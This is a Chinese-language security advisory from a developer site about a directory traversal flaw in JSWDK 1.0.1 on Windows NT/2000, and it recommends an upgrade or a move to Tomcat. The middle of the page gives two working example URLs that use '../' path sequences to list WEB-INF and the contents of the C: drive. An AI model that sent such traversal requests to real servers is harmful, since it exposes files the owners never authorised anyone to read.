当前页面: 开发资料首页 → JSP 专题 → JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
摘要: JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
JavaServer Web Dev Kit(JSWDK)
描述:
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
详细:
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞,
攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件
受影响系统:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案:
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat.
</td> </tr> </table></td> </tr> </table>
↑返回目录
前一篇: JDK配置问题
后一篇: 在Windows NT 4.0下安装Apache+Servlet+JSP